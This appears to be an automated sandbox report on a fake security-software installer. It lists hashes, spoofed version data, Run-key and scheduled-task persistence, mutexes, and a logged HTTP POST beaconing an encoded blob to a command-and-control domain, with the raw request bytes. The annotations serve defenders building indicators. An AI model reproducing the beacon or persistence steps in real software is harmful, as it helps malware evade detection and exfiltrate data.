Analysis Date: 2014-09-09 22:26:07
MD5: 0d145644710911d5af59d8bdc56914da
SHA1: a21843f6b2ad6e5610114326ce90580da47b7c40

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 3eaa392daacecedd37f79f509b295d64 sha1: 442d802f677e4dda95fb074f400ecec4e2c35d0d size: 17408
Section .rdata md5: ebcd0bb065341babf821452914598e68 sha1: fc96f1f4029f011192c302bc25b1b4d5fe782f99 size: 2560
Section .data  md5: d4307ae1a84deaee96196c69d55a1518 sha1: 99cc116a87629d4fde50cb852dba72a186d41349 size: 111104 (by far the largest section, several times the size of the code in .text — consistent with an embedded payload, though this listing alone cannot confirm that)
Section .rsrc  md5: cc5fcaef8c7d7d4925bcc8daa010e070 sha1: 279152c9f0d8d4317c65135e824492d418162690 size: 5120
Timestamp: 2009-06-16 03:46:17 (PE header timestamp; it predates the 2010 copyright string in the version resource below — both values are attacker-controlled, so neither should be treated as a reliable build date)
Version info — LegalCopyright: Copyright © 2010 Setup Technologies Gz
InternalName: Sa set_up w
FileVersion: 4.1.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: WW Internet Security 8
ProductVersion: 4.1.0.0
FileDescription: R8 Setup Self-Extractor 0T
OriginalFilename: Sa set_up w
Packer: Borland Delphi 4.0 (signature-based identification). Note that the embedded manifest in the Strings section identifies the stub as the Nullsoft NSIS v2.46 exehead and requests requestedExecutionLevel="requireAdministrator"; this contradicts both the packer match and the version resource above (CompanyName / ProductName / FileDescription), so the version resource should be treated as spoofed and not used for attribution.
PEhash: 92a0d0f5f24a3342c302860d08ee0c19cddabda1
IMPhash: 30e41d76dd3e6950a9eadd3ecb3dfd62

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe (the sample spawns a second copy of itself; the registry, file and network activity listed under the second process block below is attributed to that child)
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82} (both mutex names are fixed GUID-style strings and are re-created by the child process below; usable as host-based indicators)

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝ (the value on the next line is an opaque base64-looking blob that cannot be decoded from this report; the CY08W456F0 key name is reused for the Run entry that follows)
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe (user-level HKCU Run persistence: the sample registers itself to start at logon)
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1 (these three Internet Settings accesses look like the proxy/zone lookups WinINet performs for the HTTP POST below rather than deliberate configuration changes — confirm whether they are reads or writes before using them as indicators)
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job (a scheduled-task job file — a second persistence mechanism alongside the HKCU Run entry above)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint (a socket handle; together with the WinINet index.dat files and the WininetConnectionMutex below this indicates the HTTP POST is issued through WinINet)
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com (of the two domains the sample itself looked up, only qqplot.com resolved and received traffic; see Network Details)

Network Details:

DNS: wsj.com
Type: A
205.203.140.65
DNS: wsj.com
Type: A
205.203.132.1
DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.140.1
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217 (wsj.com, fastclick.com and nifty.com resolved but no TCP flow to any of their addresses is recorded below — possibly a connectivity check; they are not shown to be attacker-controlled and should not be blocklisted on this evidence alone)
DNS: qqplot.com
Type: A
109.74.195.149 (the only host that received traffic in this run; see the HTTP POST and TCP flow below)
DNS: lacvictoria.com
Type: A (no address recorded — the name did not resolve during this run)
DNS: paulo-fg.com
Type: A (no address recorded — the name did not resolve during this run)
DNS: bonreligion.com
Type: A (no address recorded — the name did not resolve during this run)
HTTP POST: http://qqplot.com/borders.php (341-byte application/x-www-form-urlencoded body consisting of a single data= parameter carrying a base64-looking blob; see Raw Pcap — the content is not decodable from this report)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) (an outdated, apparently fixed UA string, combined with Cache-Control: no-cache on a POST to a .php path — a useful network detection anchor)
Flows: TCP 192.168.1.1:1031 ➝ 109.74.195.149:80 (qqplot.com per the A record above; the only TCP flow recorded)

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   31396b66 694f4870 37655263 48506959   19kfiOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3555 366e3336 642f3334 6b6f6c56   I+5U6n36d/34kolV
0x00000240 (00576)   31614b51 6e2b513d 3d                  1aKQn+Q==


Strings
9....
.
"
..
.
.
R..YV
040904E4
 2010  Setup Technologies Gz
4.1.0.0
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
n5b5S
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
pRSE
R8 Setup Self-Extractor 0T
rE4r
Resource %s not found
Sa set_up w
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
WW Internet Security 8
) =+ %
07K*,|
	0>B}Kp
0_/fo)
0lC8p@!
1	'2@f
136cuoHL
14:6265;]
?/1e$b
(\1ehn"t
1nhFi1
'1PGLQ
2c$]AX
2X(|(P
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3zX2$C:pKH
40IOi'on$s
;\4~D1
4#DEP`
4	g*uF
4kwX O/r
4	QNCE
4sT}Ej
&4@Us?
5d_v cC
5Ey-> Z
5Ono5PiZh
66roaA
6J6WuD
6$O9JX
7c(05C
7JOkjZ
7k"o*Y
81B ^:aE
=8( 529
8#@EHL
(#8EHT
8FVkpD
8#LE\l
%8n(<Ye`n"X
8#OA1P
.8[.>OJ
	8`Pd01s
8W@G[4
;9aVGr
9st2KP
A0_N6?Yh
A4J1"`xH
Adz{ps
/:aH0G
AHjLG]Z
andLui
A{`QGd
AQP]SR
<a$vO(
ayO)!cj
B1ExOy
B"2e v
B3/h{8bu4
b5Q#%$
B!"EC>
BEIuPuD
bPt$#0$
BQAsN8
CP$60e
)Cp y-
.c"q|m#
@ Csh j
C^$,V+
CVz_'k
%|d1:V
 D3x#:
d$(?A1
@.data
DeleteFileA
dI#PW&|
(\dL<[
dRigUzhm
*dS";L_@
*dS#;L
Dw$xtCf
dx	"^O7p
e<<$@.
}eCqf}
] e&DS
\	edsl%
E`;F\}3
ehw'	(
=Em#$D
EnumCalendarInfoA
ESNs1s
eT0@Kr
Ff=]Iy
FindClose
FindFirstFileA
F+ j[\
FOGYF9]
_frJ\E0
F%x8O,
G017Ujx15
,G	=5LI
|g6,( 
G;,B;hAH`
(:G ,E
GetMenu
GetWindowLongA
GetWindowLongW
GetWindowPlacement
GetWindowRect
Ggc%V\
.G]#gr,e
GwYpd$t
$:= h;
h6XD)P@
H+ 8P<
H~9D	=
#H/!<(D
hD+2Adq7
=HDuaF
Hj(o$)o
?Hn:v.
Ho(BX8]
#[ H*PQ
HPSPQ=
hS1=pH
H#TE\h
#hTP)!
HWWgjTd
i6s!-3d
iBy[T=oW:d
IC[)r 
IEGmXrp
I^h(IF
ij.E:u
}i'N`	P
iPr8Zf
Is#hLWr
-i%#vc
I&--[w
I$XO$E`
JD^g`3
, (jg%
Jqj,UW
J>tI,F
Kd	dm3!u
KERNEL32.dll
K	eTs]8f
kNueh8
l9 n(k
Lc)5o91LOLE
lcnYYxNGEDvYJn@12
|lfI!SH&LWC@
-lHwRy
^l&"jTd
L; LpL
LoadLibraryA
LocalAlloc
.lp^Q[
lr	+lv
%ls~.p(
lzSJ^Fp$^
&`M(>c
Mi/@1o
mNL	ZQ
 :  N1}
n9}Hr]
n E0Mf
n]H\p?
n"K,02
NuX`2J*
nX%ha`
nYdI	9
nY`ItY
^;O6Q2
_o_AAP0U@16
oc)mi][
_OCx-F
P1Dmof
,_P|?B
@#PEh|
PIGODe@24
-_?P+Ly/
p@	"	p
pPawh 
pRI->	-T
pVM79+
P#XE`d
QbfqoS
QMEuDyZTlg
Q.t8ex
QU9_D|?
q[[x3tR)
qxl0sg
qz/5#$
=$R$+/
%[*!R^
	r(1S$q 
'r3C:O ?
`.rdat
`.rdata
,R=DQM
RIGzrt
$Rj9@U4
!'R#LIWn~
ro(PYd8j)(dY
R%,]#!pzE
rQIder
R*(S;'P
 ]RT.6
RU.(:S
R]Y(T1e
<RzPSSm
RZy f>
S]4$`0[.e2
Sa set_up w
sc!pD$
se	# 4
_SfaPIK@4
Sfe[sJ
shlwapi
S-JAWu
#S_L(vE5
?sNY}Q
}/spBW
ST0MX}r
sXfMNN
T)=3iM<!
!T4K8"JX5
t;8;o`
t{99pv
tB<Zd0
}Tch"|;c
td	&:C
tDW"De]8
TE\#d#
tEL: LN1}
t%`h!.
This program must be run under Win32
tPHuJ1
TSQiKw87LsIcm3
,*tTTD
	/t}}u=Oy
U2mAh"C
u6)9Ex#
u?9|0\;"
u(Cc2\
u	dO3YX
!UNIQSTR
USER32.dll
uS!/x1h
uZs*?eO
v4NXRz
VC?Afs
VDb!"#/
vE$EPt
VH$)dK
VirtualAlloc
V`Jp/(}4
VL:4"Y8%
vN(1{e
v+P1jR:
;<]$	.vV
w,_2'9
$w2PJ8
W!3SX"#YA Z
&w5MiDv$
^W7SVC
wC5%Vz@
W \I -
W~I!SR
W*iz	F
X#`El|
_XEVOSL@20
x\Ez0|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
xUBsxM
!,Y_*,
Yjr0Q@4
yQIaZA\
)ySxW,
YxzwbR
<(Yz96
Z&D_=CM
z^g#fS
,z.,qVp
ZVJyWX